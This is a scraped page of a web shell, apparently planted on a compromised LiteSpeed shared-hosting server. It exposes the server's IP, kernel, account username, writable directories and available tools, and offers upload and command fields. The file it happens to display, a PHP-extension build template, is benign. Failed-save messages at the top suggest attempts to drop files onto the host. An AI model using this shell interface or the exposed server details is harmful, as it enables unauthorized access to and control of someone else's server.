Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.137.175.83
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/admin/html/utility/build_php/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/admin/html/utility/build_php/build_prepare_ext.template
###########################################
EXTENSION_NAME="__extension_name__"
EXTENSION_SRC=__extension_src__
EXTRACT_METHOD="__extract_method__"
EXTENSION_DIR="__extension_dir__"
EXTENSION_DOWNLOAD_URL="__extension_download_url__"
###########################################

echo "============================================================="
main_msg "Preparing source code for building ${EXTENSION_NAME} Extension"
echo "============================================================="
echo ""

echo "Changing to build directory ${PHP_BUILD_DIR}" 
cd ${PHP_BUILD_DIR}
check_errs $? "Could not get into build directory"

if [ -e "${EXTENSION_SRC}" ] ; then
	main_msg "${EXTENSION_SRC} already downloaded, use the saved copy."
	NEW_DOWNLOAD=N
else
	main_msg "Retrieving ${EXTENSION_NAME} extension source archive ${EXTENSION_DOWNLOAD_URL}" 
	${DL_METHOD} ${EXTENSION_SRC} ${EXTENSION_DOWNLOAD_URL}
	check_errs $? "Fail to retrieve ${EXTENSION_NAME} extension source archive"
	echo ""
	NEW_DOWNLOAD=Y
fi

echo "Changing to build directory php-${PHP_VERSION}" 
cd php-${PHP_VERSION}
check_errs $? "Could not get into build directory"

echo "Copying ${EXTENSION_NAME} extension source archive" 
cp ../${EXTENSION_SRC} .
check_errs $? "Could not copy"

main_msg "Extracting ${EXTENSION_NAME} extension source archive: ${EXTRACT_METHOD} ${EXTENSION_SRC}" 
${EXTRACT_METHOD} ${EXTENSION_SRC}

if [ "$?" -ne "0" ] ; then
	# remove bad copy
	rm -f ${EXTENSION_SRC} ../${EXTENSION_SRC}
	check_errs $? "Fail to remove bad copy ${EXTENSION_SRC}"

	if [ "${NEW_DOWNLOAD}" = "Y" ] ; then
		check_errs 1 "Could not extract ${EXTENSION_NAME} extension source archive"
	else
		main_msg "Failed to extract existing copy. try download again."
	
		main_msg "Retrieving ${EXTENSION_NAME} extension source archive ${EXTENSION_DOWNLOAD_URL}" 
		${DL_METHOD} ../${EXTENSION_SRC} ${EXTENSION_DOWNLOAD_URL}
		check_errs $? "Fail to retrieve ${EXTENSION_NAME} extension source archive"
		NEW_DOWNLOAD=Y
	
		cp ../${EXTENSION_SRC} .
		check_errs $? "Could not copy"
	
		main_msg "Extracting ${EXTENSION_NAME} extension source archive: ${EXTRACT_METHOD} ${EXTENSION_SRC}" 
		${EXTRACT_METHOD} ${EXTENSION_SRC}
		
		if [ "$?" -ne "0" ] ; then
			# remove bad copy
			rm -f ${EXTENSION_SRC} ../${EXTENSION_SRC}
			check_errs $? "Fail to remove bad copy ${EXTENSION_SRC}"

			check_errs 1 "Could not extract ${EXTENSION_NAME} extension source archive"
		fi
		
	fi
	
fi


echo "============================================================="
main_msg "Finished gathering source code for building ${EXTENSION_NAME} extension"
echo "============================================================="

Youez - 2016 - github.com/yon3zu
LinuXploit